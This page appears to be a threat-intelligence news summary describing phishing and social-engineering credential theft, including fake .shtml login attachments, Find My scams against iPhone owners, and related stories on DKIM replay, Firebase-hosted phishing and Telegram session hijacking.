Credential Theft via Phishing and Social Engineering Techniques
Attackers are increasingly leveraging simple yet effective phishing and social engineering tactics to steal user credentials. One observed method involves sending phishing emails with malicious attachments, such as .shtml files, that present fake login screens to unsuspecting victims. These screens are designed to capture any credentials entered and immediately transmit them to attackers via Telegram bots, making detection and takedown more difficult. The phishing campaigns often use compromised legitimate email accounts and minimal social engineering, relying on the likelihood of password reuse across multiple sites to maximize the value of stolen credentials.
Another prevalent technique targets iPhone owners whose devices have been lost or stolen. Scammers exploit the contact information displayed on the device's lock screen to send convincing messages that mimic Apple's Find My service, tricking victims into entering their Apple ID credentials on fake websites. With these credentials, attackers can unlock, wipe, and resell the devices, as well as access sensitive personal data. These attacks highlight the ongoing evolution of credential theft tactics, emphasizing the need for vigilance against both low-sophistication phishing and more targeted social engineering schemes.
Sources
Related Stories
Phishing Campaigns Abuse Trusted Platforms and Legitimate Workflows to Evade Detection
Multiple campaigns are abusing *legitimate* cloud and platform workflows to make phishing and fraud harder to detect. Attackers are generating real Apple and PayPal invoice/dispute emails and embedding scam phone numbers in user-controlled fields (e.g., “seller notes”), resulting in messages that carry valid **DKIM** signatures and originate from high-reputation domains; this “**DKIM replay**” style abuse bypasses many email controls because authentication validates the sender domain, not the safety of the embedded content. In parallel, threat actors are leveraging free **Google Firebase** developer accounts to host brand-mimicking phishing pages on trusted `firebaseapp.com` / `web.app` subdomains, increasing delivery and click-through rates by exploiting domain reputation and common allowlisting of Google infrastructure. A separate but related social-engineering technique targets **Telegram** users by manipulating Telegram’s official authentication workflows to obtain fully authorized sessions rather than simply stealing passwords. Victims are lured to Telegram-lookalike pages (often on ephemeral domains) that prompt QR scanning or phone-number entry; user interaction triggers a real login attempt initiated by the attacker, and once the victim approves the authorization prompt on their device, the attacker gains persistent account access and can pivot to follow-on attacks via the victim’s contacts. These incidents collectively highlight a shift toward “living off trusted services,” where adversaries avoid compromising vendors and instead weaponize legitimate features, trusted domains, and sanctioned authentication flows to reduce detection and increase victim compliance.
1 months agoSocial Engineering Scams Exploiting Mobile Device Features to Steal Credentials and Funds
Cybercriminals are increasingly leveraging built-in features of popular mobile platforms to execute sophisticated social engineering scams aimed at stealing sensitive credentials and financial assets. On WhatsApp, scammers exploit the screen-sharing function by impersonating trusted entities such as bank employees or support agents, coercing victims into sharing their screens under the pretense of resolving urgent security issues. This access enables attackers to view and capture one-time passwords (OTPs), banking details, and other personal information, resulting in significant financial losses. In response, Meta has introduced AI-powered safety tools, including real-time warnings when users attempt to share their screens with unknown contacts, to mitigate these attacks. Similarly, iPhone users are being targeted through phishing campaigns that exploit the "Find My" feature. After a device is lost or stolen, scammers send convincing fake messages—purportedly from Apple Support—containing links that claim to help locate the missing phone. By leveraging accurate device details and the victim's sense of urgency, attackers trick users into divulging their Apple ID credentials, potentially granting full access to personal data and accounts. Authorities such as Switzerland’s National Cyber Security Centre have issued warnings about these tactics, emphasizing the need for heightened vigilance when responding to unsolicited messages related to lost devices.
4 months ago
Email-Borne Social Engineering and Credential Theft Risk
Recent coverage emphasized that **phishing and social engineering via email** remain a primary initial access vector, with attackers increasingly blending into routine workflows (emails, meeting invites, and trusted SaaS notifications). TechTarget highlighted that user judgment is often the last control when filters fail, citing the *Microsoft Digital Defense Report 2025* claim that **28% of breaches** trace back to phishing/social engineering, and noting reports of spam relayed through **legitimate Zendesk domains/instances** (e.g., leveraging recognizable brands) to bypass filtering and drive credential theft or follow-on access. Separate reporting and guidance reinforced how attackers operationalize these patterns: The Hacker News described **Operation Nomad Leopard**, a spear-phishing campaign targeting Afghan government entities using government-themed decoys and a **GitHub-hosted ISO** that drops a **LNK** to execute a **FALSECUB** backdoor capable of remote command execution. Other items in the set were largely general best-practice or “common threats” explainers (password hygiene, generic threat overviews) rather than incident-specific intelligence, but they align with the same overarching risk theme: weak/reused passwords and routine email behaviors continue to enable account takeover and downstream compromise.
1 months ago